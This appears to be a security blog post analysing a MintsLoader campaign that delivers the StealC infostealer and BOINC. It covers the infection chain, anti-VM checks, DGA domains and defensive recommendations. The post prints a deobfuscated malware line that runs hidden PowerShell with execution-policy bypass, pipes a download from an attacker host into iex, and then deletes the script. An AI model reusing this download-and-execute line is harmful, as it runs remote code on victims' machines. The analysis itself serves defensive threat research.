# MintsLoader Delivers StealC Malware and BOINC in Targeted Cyber Attacks

## **Overview**

Recently, there has been an ongoing campaign using a malware loader called MintSloader to distribute malicious payloads like Stealc Information Stealer and Boinc.

According to the cybersecurity company Esentire, this campaign mainly targets electric, oil and gas companies, and legal services sectors in the United States and Europe.

## **Key Findings**

MintsLoader is a **malware loader** used to spread and deploy other malware on victims' computers. According to recorded reports, it is often distributed through:

* **Fake websites or pirated software**
    
* **Phishing emails**
    
* **Malvertising**
    

The MintsLoader infection process begins when a victim clicks a link in a spam email that downloads a JScript file matching the regex pattern, Fattura \[0-9\]{8}.js.

![Figure 1 – JScript download](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-1-Victim-download.png align="center")

StealC is a type of **information-stealing malware**, designed to collect sensitive data from infected devices. It mainly targets **web browsers** and popular applications to steal:

* **Login information** (username, password)
    
* **Browser cookies** (to maintain session even if the password is changed)
    
* **Autofill data** like credit card numbers, addresses
    
* **Cryptocurrency wallets** and bank account information
    
* **Clipboard data** (which may contain passwords or authentication codes)
    

BOINC **is not malware**, but in some cases, hackers can misuse this platform to mine cryptocurrency or perform unauthorized computations using other people's computers.

The content of the *JScript* file has been recorded.

![Figure 2 – JScript obfuscated contents](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-2-Fattura-obfuscated.png align="left")

## **How attackers carry out the campaign**

1. Initially, the attacker will trick the victim into downloading an infected file from an unclear source, such as through email or a strange website. In this campaign, the file `“Fattura[0-9]{8}.js“` was downloaded onto the victim's machine.
    
2. The attacker will use a malicious Powershell script related to **Windows Script Host (WSH)**, which can be used to download and execute malware from a web address, then delete itself from the victim's system.
    
    ![Figure 3 - Deobfuscated JScript contents](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-3-Deobfuscated-JScript-contents.png align="left")
    
    2.1 `Wscript.Sleep(13000);`:
    
    * This command makes the script pause for 13 seconds. This can be used to delay the execution of the rest of the code, possibly to avoid detection by security software or to create the necessary time for preparation before executing the malicious code.
        
    
    2.2`var shell = WScript.CreateObject ("`[`Wscript.Shell`](http://Wscript.Shell)`");`:
    
    * This code creates a [**WScript.Shell**](http://WScript.Shell) object, which allows the script to execute system commands, such as running programs or executing code.
        
    
    2.3 [`shell.Run`](http://shell.Run)`("powershell -noprofile —executionpolicy bypass -WindowStyle hidden -c \"curl -useb *`[`http://mubuzb3vwv`](http://mubuzb3vwv) `[.]top/1.php?s=nints13' | iex\"");`:
    
    * [`shell.Run`](http://shell.Run)`()`: This command is used to run a command in the system environment. The command asks PowerShell to execute a command.
        
    * `powershell -noprofile —executionpolicy bypass`: This is a way to run PowerShell without loading the user profile and bypassing the execution policy to allow the execution of malicious code.
        
    * `-WindowStyle hidden`: Execute PowerShell in hidden mode, not showing the PowerShell window to the user.
        
    * `curl -useb` [`http://mubuzb3vwv.top/1.php?s=nints13`](http://mubuzb3vwv.top/1.php?s=nints13) `| iex`:
        
        * `curl`: Used to download content from a URL.
            
        * URL [`http://mubuzb3vwv.top/1.php?s=nints13`](http://mubuzb3vwv.top/1.php?s=nints13): This is a web address where the malware will be downloaded. After downloading, the malware is **piped** (`|`) into `iex` (an alias for `Invoke-Expression` in PowerShell), causing the malware from this website to execute on the system.
            
    
    2.4 `var filesystemobj = WScript.CreateObject("Scripting.FileSystemobject");`:
    
    * This code creates a **FileSystemObject**, allowing the script to interact with the file system, such as creating, deleting, or copying files.
        
    
    2.5 `filesystemobj.DeleteFile(WScript.ScriptFullName);`:
    
    * This command deletes the current **script** file (the file where the code is running). `WScript.ScriptFullName` returns the full path of the current script file, so when this code is executed, the script deletes itself from the system.
        
3. The next step involves running a PowerShell script to:
    
    * **Download and execute malware** from a command and control (C2) server.
        
    * **Install StealC Malware or BOINC mining software** to steal information or exploit system resources.
        
    * **Open a backdoor on the victim's machine**, allowing hackers to access the system remotely.
        
    * **Avoid detection** by obfuscating PowerShell commands to evade security software.
        
    
    ![Figure 4 – Obfuscated first stage](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-4-%E2%80%93-Obfuscated-first-stage.png align="center")
    
    ![Figure 5 – Obfuscated next stage](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-5-%E2%80%93-Obfuscated-next-stage.png align="center")
    
4. The attacker performs checks on the victim's machine environment to see if it is a virtual machine by running a PowerShell script and using anti-analysis techniques (Anti-VM Detection).
    
    ![Figure 6 – Check if virtual machine via Get-MpComputerStatus](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-6-%E2%80%93-Check-if-virtual-machine-via-Get-MpComputerStatus.png align="left")
    
    ![Figure 7 – Check if virtual machine via Win32_VideoController object AdapterDACType](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-7-%E2%80%93-Check-if-virtual-machine-via-Win32_VideoController-object-AdapterDACType.png align="left")
    
    ![Figure 8 – Check if virtual machine via Win32_CacheMemory](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-8-%E2%80%93-Check-if-virtual-machine-via-Win32_CacheMemory.png align="left")
    
5. After completing the checks on the victim's system, the attacker continues to execute PowerShell to **create a random C2 (Command & Control) domain**. This helps the malware communicate with the control server without being easily detected or blocked by cybersecurity measures.
    
    ![Figure 11 – Known DGA domains](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-11-%E2%80%93-Known-DGA-domains.png align="center")
    
    ![Figure 10 – Send request to C2 and invoke response](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-10-%E2%80%93-Send-request-to-C2-and-invoke-response.png align="left")
    
    * Initially create a `$c2` as an empty string
        
    * Generate a random domain name from the alphabet
        
    * Append `.top` to create the C2 domain name
        
6. The next step in this campaign involves the attackers executing a malicious script with the aim to:
    
    * **Pause execution using** `sleep()` to avoid detection.
        
    * **Disable AMSI protection in Windows Defender**.
        
    * **Download the malicious executable file (**`aa.exe`) from a remote server ([`temp.sh`](http://temp.sh)).
        
    * **Run the executable file (**`aa.exe`) to infect the system.
        
    
    ![Figure 12 – Final stage, download/execute StealC](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-12-%E2%80%93-Final-stage-downloadexecute-StealC.png align="left")
    
7. After completing the execution of MintsLoader on the victim's machine, the attacker proceeds to deploy StealC Malware. It will start with a piece of C code **to check the infected machine's environment** before continuing execution. If the computer or user is invalid, the program will **exit itself (**`ExitProcess(0)`) to avoid analysis.
    
    ![Figure 16 – StealC username check for JohnDoe](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-16-Username-check-JohnDoe.png align="center")
    
8. Then StealC Malware continues to check to avoid infection in certain countries: Russia, Ukraine, Belarus, Kazakhstan, Uzbekistan. When it detects that the victim's machine is in one of these countries, the malware will automatically exit to avoid legal risks.
    
    ![Figure 17 – StealC check for banned countries](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-17-Lang-check.png align="center")
    
9. In addition to checking the computer name, user, and country, the attacker continues by checking the number of CPUs. If it finds the machine has **fewer than 2 CPUs**, the malware will **exit itself (**`ExitProcess(0)`). Virtual machines usually have 1 CPU to save resources. Then a piece of C code is executed to check the victim's machine RAM size. If the machine has **less than 1111 MB**, the malware will **exit itself**.
    
    ![Figure 18 – StealC processors check](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-18-Processors-check.png align="center")
    
    ![Figure 19 – StealC memory check](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-19-Memory-check.png align="center")
    
10. After completing the checks, **StealC can start stealing**:
    
    * **Usernames and passwords** from browsers
        
    * **Browser cookies** (which can be used to hijack accounts)
        
    * **Autofill data** such as bank card information and addresses
        
    * **Cryptocurrency wallets** from crypto management software
        
    * **Clipboard data** (which may contain passwords or OTP codes)
        
    
    \=&gt; After collecting the data, StealC sends all the information to the **hacker's server**.
    
11. Immediately after, BOINC (Berkeley Open Infrastructure for Network Computing) will be deployed. **Hackers exploit BOINC to use computer resources** for purposes such as:
    
    * **Cryptocurrency mining** by using the victim's CPU/GPU without their knowledge.
        
    * **Performing complex calculations** for fake projects to gain profit.
        

## **IOC**

[iocs/MintsLoader/MintsLoader\_Stealc\_01\_14\_2025.txt at main · eSentire/iocs · GitHub](https://github.com/eSentire/iocs/blob/main/MintsLoader/MintsLoader_Stealc_01_14_2025.txt)

## **Recommendations**

* **Do not download software from unknown sources**, especially cracked software or pirated games.
    
* **Do not open suspicious emails or links**, even if they appear to be from a legitimate organization.
    
* **Regularly update software and operating systems** to avoid security vulnerabilities.
    
* **Check for hidden processes running on your system**; if you see BOINC or unfamiliar software that you didn't install, investigate immediately.
    
* **Use strong antivirus software** to detect malware loaders like MintsLoader.
    

## **Conclusion**

The MintSloader campaign is reported to target organizations in the US/Europe, mainly distributed through spam emails containing links to JScript files or via clickfix/kongtuke. When combined with information stealers like Stealc, it poses a threat to the security and integrity of sensitive data.

**MintsLoader is a dangerous tool** that can be used to **deploy StealC Malware (data theft) and BOINC (exploiting computer resources)** without the victim's consent. If you suspect your system is infected, you should **check and remove it immediately** to prevent serious consequences.

## **References**

1. [MintsLoader Delivers StealC Malware and BOINC in Targeted Cyber Attacks](https://thehackernews.com/2025/01/mintsloader-delivers-stealc-malware-and.html)
    
2. [eSentire | MintsLoader: StealC and BOINC Delivery](https://www.esentire.com/blog/mintsloader-stealc-and-boinc-delivery)
